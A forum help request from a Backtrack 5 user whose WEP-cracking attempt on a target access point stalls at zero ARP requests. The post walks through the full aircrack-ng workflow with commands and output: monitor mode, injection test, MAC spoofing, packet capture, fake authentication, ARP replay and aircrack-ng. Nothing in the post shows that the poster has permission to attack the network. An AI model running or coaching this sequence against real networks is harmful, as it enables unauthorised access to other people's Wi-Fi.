Hello everyone.
First of all I made a seach in the wiki and in this forum but I didn't find anything relevant. In google there are many people having my same problem but the only solution I found is "enable monitor mode and wait" but it doesn't work for me.
>> Introduction:
I'm using Backtrack 5 R2 (live cd). GNOME. Architecture: 64-bit
My chipset is Ralink RT2870/3070 and according to official wiki works: http://www.backtrack-linux.org/wiki/..._working_cards
I also tried by myself injection test ( aireplay-ng -9 wlan1 ) and it says "injection working!" and then lists the AP available (I did this after chanching the channel of my interface to the channel where the target AP is: iwconfig wlan1 channel 6 (it is wlan1,and not wlan0,because I have two wireless adapters)
My problem is that airodump gets many packets but "0 ARP requests" and "send 0 packets"
>> Details
(of course where I say <my fake mac>,<my target mac> etc.. is just for privacy,but I wrote the correct MacS
There is was I did:
airmon-ng start wlan1
Code:
Interface Chipset Driver
wlan1 Ralink RT2870/3070 rt2800usb - [phy1]
(monitor mode enabled on mon0)
wlan0 Atheros AR9285 ath9k - [phy0]
aireplay-ng -9 mon0
Code:
04:50:57 Trying broadcast probe requests...
04:50:57 Injection is working!
04:50:59 Found 10 APs
04:50:59 Trying directed probe requests...
04:50:59 <mac> - channel: 6 - 'AP_NAME'
04:50:59 Ping (min/avg/max): 1.418ms/3.128ms/7.077ms Power: -67.87
04:50:59 30/30: 100%
< More AP >
airmon-ng start mon0 6
Code:
Interface Chipset Driver
mon0 Ralink RT2870/3070 rt2800usb - [phy1]
(monitor mode enabled on mon1)
wlan1 Ralink RT2870/3070 rt2800usb - [phy1]
wlan0 Atheros AR9285 ath9k - [phy0]
ifconfig mon0 down
macchanger --mac <fake mac> mon0
Code:
Current MAC: <my wlan1/mon0/mon1 true mac> (<mac producer>)
Faked MAC: <fake mac> (unknown)
airodump-ng -c 6 -w wep123 --bssid <my target mac> mon1
(Partial output,I can't copy-paste from the window due to it refreshs every second)
Code:
***
CH 6 ] [Elapsed: 3 mins] <date> <hour>
BSSID PWR ......
<my target mac> -37 24 ....
BSSID STATION ......
==> ctrl+shift+N to Open a new console (second console):
aireplay-ng -1 0 -a <mac of target> -h <fake mac> mon1
Code:
05:11:45 Sending Authentication Request (Open System) [ACK]
05:11:45 Authentication successful
05:11:45 Sending Association Request [ACK]
<looping the same 3 lines..>
After this I noticed a new line appeared in the first console***
Updated code:
Code:
***
CH 6 ] [Elapsed: 3 mins] <date> <hour>
BSSID PWR ......
<my target mac> -37 24 ....
BSSID STATION .....
<target mac> <my fake mac> ...
==> ctrl+shift+N to Open a new console (third console):
aireplay-ng -3 -b <mac of target> -h <fake mac> mon1
Code:
05:16:45 Waiting for beacon frame (BSSID: <mac of the target>) on channel 6
Saving ARP requests in replay_arp-0518-051645.cap
You should also start airodump-ng to capture replies.
Read 5797 packets (got 0 ARP requests and 25 ACKs), sent 0 packets...(0 pps)
And even when 80000 packets have been read still 0 ARP and 0 sent and 0 pps.
Finally I tried (in a fourth window):
aircrack-ng -b <mac of target> replay_arp-0518-051645.cap
Code:
Opening replay_arp-0518-051645.cap
No matching network found - check your bssid.
Quitting aircrack-ng...
The solutions I tried is to do:
- airodump-ng -c 6 -w wep123 --bssid <my target mac> mon0 (and also in the following using mon0 instead of mon1)
- I tried to use my true mac and also the fac mac in combination with mon 0 and/or mon1
- I tried to first start capturing packet,then putting in
But the result is always the same.
Thank you for any hint!
Regards